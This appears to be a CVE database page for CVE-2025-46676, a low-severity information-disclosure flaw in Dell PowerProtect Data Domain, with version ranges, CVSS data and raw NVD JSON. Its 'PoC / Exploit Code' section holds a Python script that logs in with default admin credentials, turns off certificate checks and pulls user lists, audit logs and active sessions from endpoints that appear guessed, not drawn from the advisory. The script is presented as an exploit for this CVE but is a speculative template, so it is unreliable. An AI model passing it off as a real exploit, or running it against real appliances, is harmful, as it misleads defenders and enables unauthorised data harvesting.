Security Vulnerability Report
CVE-2025-46676 CVSS 2.7 LOW


Published: 2026-01-09 16:16:07
Last Modified: 2026-02-05 13:28:12

Description

Dell PowerProtect Data Domain with Data Domain Operating System (DD OS), Feature Release versions 7.7.1.0 through 8.4.0.0, LTS2025 release version 8.3.1.10, LTS2024 release versions 7.13.1.0 through 7.13.1.40, and LTS2023 release versions 7.10.1.0 through 7.10.1.70, contains an Exposure of Sensitive Information to an Unauthorized Actor vulnerability. A high-privileged attacker with remote access could potentially exploit this vulnerability, leading to information disclosure.

CVSS Details

CVSS Score: 2.7
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

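cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* (from 7.7.1.0 up to, but excluding, 7.10.1.80) - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* (from 7.13.1.0 up to, but excluding, 7.13.1.50) - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* (from 8.3.1.0 up to, but excluding, 8.3.1.20) - VULNERABLE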
cpe:2.3:o:dell:data_domain_operating_system:8.4.0.0:*:*:*:*:*:*:* - VULNERABLE
Dell PowerProtect Data Domain DD OS Feature Release 7.7.1.0 - 8.4.0.0
Dell PowerProtect Data Domain DD OS LTS2025 8.3.1.10
Dell PowerProtect Data Domain DD OS LTS2024 7.13.1.0 - 7.13.1.40
Dell PowerProtect Data Domain DD OS LTS2023 7.10.1.0 - 7.10.1.70

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46676 PoC - Dell PowerProtect Data Domain Information Disclosure
# Note: This is a conceptual PoC for authorized security testing only
import requests
import json

TARGET = "https://<dell-data-domain-ip>"
LOGIN_ENDPOINT = f"{TARGET}/api/login"
SENSITIVE_ENDPOINT = f"{TARGET}/api/v1/sensitive-info"


def authenticate(username, password):
    """Authenticate with high-privileged account"""
    session = requests.Session()
    auth_data = {
        "username": username,
        "password": password
    }
    response = session.post(LOGIN_ENDPOINT, json=auth_data, verify=False)
    return session if response.status_code == 200 else None


def exploit_information_disclosure(session):
    """
    Attempt to access sensitive information
    This endpoint may expose system configuration or user data
    """
    headers = {
        "Content-Type": "application/json",
        "X-Requested-With": "XMLHttpRequest"
    }
    # Try accessing potentially sensitive endpoints
    sensitive_paths = [
        "/api/v1/system/config",
        "/api/v1/users/list",
        "/api/v1/audit/logs",
        "/api/v1/sessions/active"
    ]
    results = []
    for path in sensitive_paths:
        response = session.get(f"{TARGET}{path}", headers=headers, timeout=10)
        if response.status_code == 200:
            results.append({
                "endpoint": path,
                "data": response.json()
            })
    return results


def main():
    print("CVE-2025-46676 PoC - Dell PowerProtect Data Domain")
    print("=" * 50)
    # Replace with authorized credentials
    username = "admin"
    password = "password"
    session = authenticate(username, password)
    if session:
        print("[+] Authentication successful")
        print("[*] Extracting sensitive information...")
        data = exploit_information_disclosure(session)
        if data:
            print(f"[+] Found {len(data)} sensitive endpoints")
            for item in data:
                print(f"\nEndpoint: {item['endpoint']}")
                print(json.dumps(item['data'], indent=2))
        else:
            print("[-] No sensitive information accessible")
    else:
        print("[-] Authentication failed")


if __name__ == "__main__":
    main()

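References

Vendor Advisory: https://www.dell.com/support/kbdoc/en-us/000405813/dsa-2025-415-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities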

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46676", "sourceIdentifier": "[email protected]", "published": "2026-01-09T16:16:06.760", "lastModified": "2026-02-05T13:28:12.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4.0.0, LTS2025 release version 8.3.1.10, LTS2024 release versions 7.13.1.0 through 7.13.1.40, LTS 2023 release versions 7.10.1.0 through 7.10.1.70, contain an Exposure of Sensitive Information to an Unauthorized Actor vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure."}, {"lang": "es", "value": "Dell PowerProtect Data Domain con Data Domain Sistema Operativo (DD OS) de las versiones Feature Release 7.7.1.0 a 8.4.0.0, la versión LTS2025 8.3.1.10, las versiones LTS2024 7.13.1.0 a 7.13.1.40, las versiones LTS 2023 7.10.1.0 a 7.10.1.70, contienen una vulnerabilidad de Exposición de Información Sensible a un Actor No Autorizado. 
Un atacante con altos privilegios con acceso remoto podría potencialmente explotar esta vulnerabilidad, lo que llevaría a la revelación de información."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.80", "matchCriteriaId": "18AD8BC6-ABF7-4990-91C6-D228BBE4B9FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.50", "matchCriteriaId": "00F138B9-4AB9-4B79-BBEC-F5A48E2E0B05"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.3.1.20", "matchCriteriaId": "7B8DA06B-076A-495E-9BD0-246BF1E54E26"}, 
{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:8.4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "FF73C39B-827B-4A68-9708-08345F6EF979"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000405813/dsa-2025-415-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}